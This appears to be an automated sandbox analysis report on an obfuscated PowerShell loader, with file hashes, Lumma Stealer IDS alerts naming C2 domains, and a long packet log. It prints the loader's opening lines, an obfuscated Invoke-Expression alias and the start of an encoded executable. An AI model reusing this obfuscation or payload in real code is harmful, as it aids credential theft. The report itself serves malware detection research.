                                                                            SHA-512:A662CA12CB1B2E100EDC573FE1C544CC1A1DC285F83FE8129667BCA39CB499B6EC72986D9FCDAED366E9B0ED51C2AF988C03C8419D5FF70440D6C8CD11A0A349
                                                                            Malicious:false
                                                                            Preview:...................................FL..................F.".. ....N.5q...9..f..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........5q...G.6.f...=..f......t...CFSF..1.....EW)N..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)N.Z"............................c..A.p.p.D.a.t.a...B.V.1......Z ...Roaming.@......EW)N.Z ...........................k...R.o.a.m.i.n.g.....\.1.....EW.R..MICROS~1..D......EW)N.Z............................O~X.M.i.c.r.o.s.o.f.t.....V.1.....EW.S..Windows.@......EW)N.Z................................W.i.n.d.o.w.s.......1.....EW+N..STARTM~1..n......EW)N.Z......................D......H..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW#O..Programs..j......EW)N.Z......................@.......|.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)NEW)N..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......EW)N.Z$.................
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):6220
                                                                            Entropy (8bit):3.7292965457861227
                                                                            Encrypted:false
                                                                            SSDEEP:48:yf+TePCg8oU2fvsPukvhkvklCywlgjJIIlL8sSogZoKDJIIl/8sSogZo+1:h6PCg84dkvhkvCCt4JIIkH/JIIEHF
                                                                            MD5:097D0312BBBE7C31421361F199D5E9DD
                                                                            SHA1:B01619A92440857DB3D4A8E58B9226E1F003418B
                                                                            SHA-256:8C5C4BC4E512CC94723D84B5F9A3FE568A4EBAA8820A3990575607C99A0AD662
                                                                            SHA-512:A662CA12CB1B2E100EDC573FE1C544CC1A1DC285F83FE8129667BCA39CB499B6EC72986D9FCDAED366E9B0ED51C2AF988C03C8419D5FF70440D6C8CD11A0A349
                                                                            Malicious:false
                                                                            Preview:...................................FL..................F.".. ....N.5q...9..f..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........5q...G.6.f...=..f......t...CFSF..1.....EW)N..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)N.Z"............................c..A.p.p.D.a.t.a...B.V.1......Z ...Roaming.@......EW)N.Z ...........................k...R.o.a.m.i.n.g.....\.1.....EW.R..MICROS~1..D......EW)N.Z............................O~X.M.i.c.r.o.s.o.f.t.....V.1.....EW.S..Windows.@......EW)N.Z................................W.i.n.d.o.w.s.......1.....EW+N..STARTM~1..n......EW)N.Z......................D......H..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW#O..Programs..j......EW)N.Z......................@.......|.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)NEW)N..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......EW)N.Z$.................
                                                                            File type:ASCII text, with very long lines (65478), with CRLF line terminators
                                                                            Entropy (8bit):5.491524367200651
                                                                            TrID:
                                                                              File name:62.122.184.98 (3).ps1
                                                                              File size:537'125 bytes
                                                                              MD5:2b60655a425eaa036531f18e96741444
                                                                              SHA1:ffa85842df96dac9f6dac782cb1081251eaac749
                                                                              SHA256:930a09e6ee090e9f2b67e1a37270b4c31e3cb4fdad55cd8db34b11519759f145
                                                                              SHA512:42c0cb45071acb2a160888885937cf8fa541786384b5bf12b8803a61b7869f1afc45f94f2b2d138490c4079a8139bbbeec2a62c48615eb3877644de6a7da571a
                                                                              SSDEEP:12288:srScfYL0kaO7oNtiE45hXTLr1qwofa54+:1QNtobTL5ofk4+
                                                                              TLSH:62B47D3141033C6E37AA2ECEA4006EC10C9D7997BB54D550AE899176B2BE13B4F6D9FC
                                                                              File Content Preview:.. $t0='IQIQQIIQIQQEX'.replace('IQIQQ','');sal GG $t0;....$OE="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDANfKUWcAAAAAAA
                                                                              Icon Hash:3270d6baae77db44
                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                              2025-01-14T18:01:09.868069+01002059137ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (littlenotii .biz)1192.168.2.10541961.1.1.153UDP
                                                                              2025-01-14T18:01:09.877880+01002059133ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fraggielek .biz)1192.168.2.10648281.1.1.153UDP
                                                                              2025-01-14T18:01:09.890771+01002059135ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grandiouseziu .biz)1192.168.2.10576371.1.1.153UDP
                                                                              2025-01-14T18:01:09.903271+01002059141ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (marketlumpe .biz)1192.168.2.10573331.1.1.153UDP
                                                                              2025-01-14T18:01:09.914056+01002059143ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (nuttyshopr .biz)1192.168.2.10542531.1.1.153UDP
                                                                              2025-01-14T18:01:09.924697+01002059145ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (punishzement .biz)1192.168.2.10573891.1.1.153UDP
                                                                              2025-01-14T18:01:09.936322+01002059151ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spookycappy .biz)1192.168.2.10629551.1.1.153UDP
                                                                              2025-01-14T18:01:09.947255+01002059153ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (truculengisau .biz)1192.168.2.10640101.1.1.153UDP
                                                                              2025-01-14T18:01:10.624646+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049704104.102.49.254443TCP
                                                                              2025-01-14T18:01:11.784193+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.1049704104.102.49.254443TCP
                                                                              2025-01-14T18:01:12.372040+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049711188.114.97.3443TCP
                                                                              2025-01-14T18:01:13.123944+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.1049711188.114.97.3443TCP
                                                                              2025-01-14T18:01:13.123944+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1049711188.114.97.3443TCP
                                                                              2025-01-14T18:01:13.594418+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049717188.114.97.3443TCP
                                                                              2025-01-14T18:01:14.083227+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.1049717188.114.97.3443TCP
                                                                              2025-01-14T18:01:14.083227+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1049717188.114.97.3443TCP
                                                                              2025-01-14T18:01:14.833090+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049728188.114.97.3443TCP
                                                                              2025-01-14T18:01:16.415374+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049737188.114.97.3443TCP
                                                                              2025-01-14T18:01:17.485915+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049745188.114.97.3443TCP
                                                                              2025-01-14T18:01:18.529051+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049751188.114.97.3443TCP
                                                                              2025-01-14T18:01:18.991769+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.1049751188.114.97.3443TCP
                                                                              2025-01-14T18:01:19.821171+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049761188.114.97.3443TCP
                                                                              2025-01-14T18:01:19.827392+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.1049761188.114.97.3443TCP
                                                                              2025-01-14T18:01:23.192598+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049782188.114.97.3443TCP
                                                                              2025-01-14T18:01:23.963228+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1049782188.114.97.3443TCP
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Jan 14, 2025 18:01:09.971975088 CET49704443192.168.2.10104.102.49.254
                                                                              Jan 14, 2025 18:01:09.972011089 CET44349704104.102.49.254192.168.2.10
                                                                              Jan 14, 2025 18:01:09.972276926 CET49704443192.168.2.10104.102.49.254
                                                                              Jan 14, 2025 18:01:09.973572016 CET49704443192.168.2.10104.102.49.254
                                                                              Jan 14, 2025 18:01:09.973583937 CET44349704104.102.49.254192.168.2.10
                                                                              Jan 14, 2025 18:01:10.624577045 CET44349704104.102.49.254192.168.2.10
                                                                              Jan 14, 2025 18:01:10.624645948 CET49704443192.168.2.10104.102.49.254
                                                                              Jan 14, 2025 18:01:10.629590034 CET49704443192.168.2.10104.102.49.254
                                                                              Jan 14, 2025 18:01:10.629595995 CET44349704104.102.49.254192.168.2.10
                                                                              Jan 14, 2025 18:01:10.629839897 CET44349704104.102.49.254192.168.2.10
                                                                              Jan 14, 2025 18:01:10.677546978 CET49704443192.168.2.10104.102.49.254
                                                                              Jan 14, 2025 18:01:11.067842007 CET49704443192.168.2.10104.102.49.254
                                                                              Jan 14, 2025 18:01:11.111356974 CET44349704104.102.49.254192.168.2.10
                                                                              Jan 14, 2025 18:01:11.784202099 CET44349704104.102.49.254192.168.2.10
                                                                              Jan 14, 2025 18:01:11.784223080 CET44349704104.102.49.254192.168.2.10
                                                                              Jan 14, 2025 18:01:11.784261942 CET49704443192.168.2.10104.102.49.254
                                                                              Jan 14, 2025 18:01:11.784275055 CET44349704104.102.49.254192.168.2.10
                                                                              Jan 14, 2025 18:01:11.784302950 CET44349704104.102.49.254192.168.2.10
                                                                              Jan 14, 2025 18:01:11.784317970 CET49704443192.168.2.10104.102.49.254
                                                                              Jan 14, 2025 18:01:11.784317970 CET49704443192.168.2.10104.102.49.254
                                                                              Jan 14, 2025 18:01:11.784324884 CET44349704104.102.49.254192.168.2.10
                                                                              Jan 14, 2025 18:01:11.784332991 CET44349704104.102.49.254192.168.2.10
                                                                              Jan 14, 2025 18:01:11.784359932 CET49704443192.168.2.10104.102.49.254
                                                                              Jan 14, 2025 18:01:11.784394026 CET49704443192.168.2.10104.102.49.254
                                                                              Jan 14, 2025 18:01:11.885795116 CET44349704104.102.49.254192.168.2.10
                                                                              Jan 14, 2025 18:01:11.885819912 CET44349704104.102.49.254192.168.2.10
                                                                              Jan 14, 2025 18:01:11.885905027 CET49704443192.168.2.10104.102.49.254
                                                                              Jan 14, 2025 18:01:11.885905027 CET49704443192.168.2.10104.102.49.254
                                                                              Jan 14, 2025 18:01:11.885914087 CET44349704104.102.49.254192.168.2.10
                                                                              Jan 14, 2025 18:01:11.885984898 CET49704443192.168.2.10104.102.49.254
                                                                              Jan 14, 2025 18:01:11.890713930 CET44349704104.102.49.254192.168.2.10
                                                                              Jan 14, 2025 18:01:11.890783072 CET49704443192.168.2.10104.102.49.254
                                                                              Jan 14, 2025 18:01:11.895344019 CET44349704104.102.49.254192.168.2.10
                                                                              Jan 14, 2025 18:01:11.895402908 CET49704443192.168.2.10104.102.49.254
                                                                              Jan 14, 2025 18:01:11.895409107 CET44349704104.102.49.254192.168.2.10
                                                                              Jan 14, 2025 18:01:11.895420074 CET44349704104.102.49.254192.168.2.10
                                                                              Jan 14, 2025 18:01:11.895476103 CET49704443192.168.2.10104.102.49.254
                                                                              Jan 14, 2025 18:01:11.896020889 CET49704443192.168.2.10104.102.49.254
                                                                              Jan 14, 2025 18:01:11.896035910 CET44349704104.102.49.254192.168.2.10
                                                                              Jan 14, 2025 18:01:11.896053076 CET49704443192.168.2.10104.102.49.254
                                                                              Jan 14, 2025 18:01:11.896058083 CET44349704104.102.49.254192.168.2.10
                                                                              Jan 14, 2025 18:01:11.908797026 CET49711443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:11.908840895 CET44349711188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:11.909486055 CET49711443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:11.909794092 CET49711443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:11.909806967 CET44349711188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:12.371978045 CET44349711188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:12.372040033 CET49711443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:12.373469114 CET49711443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:12.373475075 CET44349711188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:12.373713017 CET44349711188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:12.375015974 CET49711443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:12.375065088 CET49711443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:12.375073910 CET44349711188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:13.123927116 CET44349711188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:13.124011993 CET44349711188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:13.124109983 CET49711443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:13.124636889 CET49711443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:13.124659061 CET44349711188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:13.124670982 CET49711443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:13.124676943 CET44349711188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:13.136827946 CET49717443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:13.136877060 CET44349717188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:13.136943102 CET49717443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:13.137213945 CET49717443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:13.137229919 CET44349717188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:13.594353914 CET44349717188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:13.594418049 CET49717443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:13.595927000 CET49717443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:13.595936060 CET44349717188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:13.596178055 CET44349717188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:13.597467899 CET49717443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:13.597493887 CET49717443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:13.597532034 CET44349717188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:14.083225965 CET44349717188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:14.083278894 CET44349717188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:14.083309889 CET44349717188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:14.083352089 CET44349717188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:14.083376884 CET49717443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:14.083408117 CET44349717188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:14.083420038 CET49717443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:14.083479881 CET44349717188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:14.083506107 CET44349717188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:14.083550930 CET49717443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:14.083559990 CET44349717188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:14.083664894 CET49717443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:14.084177971 CET44349717188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:14.088865042 CET44349717188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:14.088892937 CET44349717188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:14.088917971 CET49717443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:14.088922977 CET44349717188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:14.088937044 CET44349717188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:14.088984013 CET49717443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:14.170092106 CET44349717188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:14.170155048 CET44349717188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:14.170211077 CET49717443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:14.170238018 CET44349717188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:14.170253992 CET44349717188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:14.170301914 CET49717443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:14.170511961 CET49717443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:14.170528889 CET44349717188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:14.170537949 CET49717443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:14.170542955 CET44349717188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:14.250034094 CET49728443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:14.250080109 CET44349728188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:14.250375032 CET49728443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:14.251336098 CET49728443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:14.251358986 CET44349728188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:14.832950115 CET44349728188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:14.833090067 CET49728443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:14.834472895 CET49728443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:14.834481001 CET44349728188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:14.834743023 CET44349728188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:14.836106062 CET49728443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:14.836714983 CET49728443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:14.836764097 CET44349728188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:15.765527964 CET44349728188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:15.765614986 CET44349728188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:15.765856028 CET49728443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:15.816546917 CET49728443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:15.816585064 CET44349728188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:15.911277056 CET49737443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:15.911303043 CET44349737188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:15.911362886 CET49737443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:15.911637068 CET49737443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:15.911652088 CET44349737188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:16.415299892 CET44349737188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:16.415374041 CET49737443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:16.417007923 CET49737443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:16.417023897 CET44349737188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:16.417294025 CET44349737188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:16.418683052 CET49737443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:16.418847084 CET49737443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:16.418888092 CET44349737188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:16.418939114 CET49737443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:16.459331989 CET44349737188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:16.909528017 CET44349737188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:16.909657955 CET44349737188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:16.909725904 CET49737443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:16.909849882 CET49737443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:16.909871101 CET44349737188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:17.021035910 CET49745443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:17.021094084 CET44349745188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:17.021189928 CET49745443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:17.021688938 CET49745443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:17.021708965 CET44349745188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:17.485676050 CET44349745188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:17.485914946 CET49745443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:17.487227917 CET49745443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:17.487234116 CET44349745188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:17.487478018 CET44349745188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:17.488759995 CET49745443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:17.488931894 CET49745443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:17.488955975 CET44349745188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:17.489047050 CET49745443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:17.489056110 CET44349745188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:17.975634098 CET44349745188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:17.975755930 CET44349745188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:17.975810051 CET49745443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:17.976016045 CET49745443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:17.976035118 CET44349745188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:18.069391966 CET49751443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:18.069426060 CET44349751188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:18.069499969 CET49751443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:18.069756031 CET49751443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:18.069768906 CET44349751188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:18.528961897 CET44349751188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:18.529051065 CET49751443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:18.530316114 CET49751443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:18.530329943 CET44349751188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:18.530612946 CET44349751188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:18.532210112 CET49751443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:18.532210112 CET49751443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:18.532267094 CET44349751188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:18.991791964 CET44349751188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:18.991883039 CET44349751188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:18.992021084 CET49751443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:18.992149115 CET49751443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:18.992171049 CET44349751188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:19.344208002 CET49761443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:19.344248056 CET44349761188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:19.344347000 CET49761443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:19.344767094 CET49761443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:19.344779015 CET44349761188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:19.821060896 CET44349761188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:19.821171045 CET49761443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:19.822504044 CET49761443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:19.822509050 CET44349761188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:19.822828054 CET44349761188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:19.825705051 CET49761443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:19.826838017 CET49761443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:19.826858044 CET44349761188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:19.826955080 CET49761443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:19.826970100 CET44349761188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:19.827203035 CET49761443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:19.827219963 CET44349761188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:19.827336073 CET49761443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:19.827366114 CET44349761188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:19.827491999 CET49761443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:19.827506065 CET44349761188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:19.827637911 CET49761443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:19.827661991 CET44349761188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:19.827670097 CET49761443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:19.827675104 CET44349761188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:19.827802896 CET49761443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:19.827816963 CET44349761188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:19.827833891 CET49761443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:19.827852964 CET44349761188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:19.827934980 CET49761443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:19.827958107 CET49761443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:19.827975035 CET49761443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:19.839077950 CET44349761188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:19.839234114 CET49761443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:19.839260101 CET49761443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:19.839281082 CET49761443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:19.839335918 CET44349761188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:22.597553968 CET44349761188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:22.597677946 CET44349761188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:22.597740889 CET49761443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:22.614237070 CET49761443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:22.614257097 CET44349761188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:22.731779099 CET49782443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:22.731803894 CET44349782188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:22.731873035 CET49782443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:22.734308004 CET49782443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:22.734321117 CET44349782188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:23.192516088 CET44349782188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:23.192598104 CET49782443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:23.194139004 CET49782443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:23.194149017 CET44349782188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:23.194397926 CET44349782188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:23.195614100 CET49782443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:23.195636988 CET49782443192.168.2.10188.114.97.3
                                                                              Jan 14, 2025 18:01:23.195694923 CET44349782188.114.97.3192.168.2.10
                                                                              Jan 14, 2025 18:01:23.963156939 CET44349782188.114.97.3192.168.2.10
